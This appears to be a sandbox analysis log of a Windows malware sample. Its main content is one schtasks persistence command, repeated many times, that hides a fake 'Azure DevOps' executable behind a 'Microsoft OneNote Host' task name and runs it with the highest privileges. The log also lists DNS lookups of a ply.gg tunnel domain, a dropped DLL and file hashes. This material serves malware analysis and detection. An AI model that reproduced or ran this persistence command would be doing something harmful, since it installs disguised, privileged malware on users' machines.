SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp

Files

memory/2644-0-0x0000000000AB0000-0x0000000000B08000-memory.dmp

memory/2644-1-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/2644-19-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/2644-196-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp